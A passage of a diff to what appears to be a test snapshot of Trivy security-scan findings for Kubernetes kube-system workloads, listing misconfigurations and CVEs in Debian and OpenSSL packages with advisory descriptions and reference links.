"id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(DaemonSet 'kube-proxy' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "apt", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.36.1-8+deb11u1", - "packageName": "bsdutils", + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. + +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. + + + +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. + +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. + +The OpenSSL cms and smime command line applications are similarly affected. + + + +" +, "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "use-after-free following BIO_new_NDEF", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://bugzilla.redhat.com/2164492", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", - "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", - ], - }, - "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", - "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", - ], - }, - "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.20.10", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1664", - "installedVersion": "1.20.9", - "packageName": "dpkg", - "references": [ - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", - "https://lists.debian.org/debian-security-announce/2022/msg00115.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", - "https://security.netapp.com/advisory/ntap-20221007-0002/", - "https://ubuntu.com/security/notices/USN-5446-1", - "https://ubuntu.com/security/notices/USN-5446-2", - ], - }, - "category": "Vulnerability", - "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.2.27-2+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-34903", - "installedVersion": "2.2.27-2+deb11u1", - "packageName": "gpgv", - "references": [ - "http://www.openwall.com/lists/oss-security/2022/07/02/1", - "https://access.redhat.com/errata/RHSA-2022:6602", - "https://access.redhat.com/security/cve/CVE-2022-34903", - "https://bugs.debian.org/1014157", - "https://bugzilla.redhat.com/2102868", - "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", - "https://dev.gnupg.org/T6027", - "https://errata.almalinux.org/9/ALSA-2022-6602.html", - "https://errata.rockylinux.org/RLSA-2022:6602", - "https://linux.oracle.com/cve/CVE-2022-34903.html", - "https://linux.oracle.com/errata/ELSA-2022-6602.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", - "https://security.netapp.com/advisory/ntap-20220826-0005/", - "https://ubuntu.com/security/notices/USN-5503-1", - "https://ubuntu.com/security/notices/USN-5503-2", - "https://www.cve.org/CVERecord?id=CVE-2022-34903", - "https://www.debian.org/security/2022/dsa-5174", - "https://www.openwall.com/lists/oss-security/2022/06/30/1", - ], - }, - "category": "Vulnerability", - "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Signature spoofing via status line injection", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-34903", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6602", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-34903", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, { "type": "URL", - "value": "https://bugs.debian.org/1014157", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2102868", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://dev.gnupg.org/T6027", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6602", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + 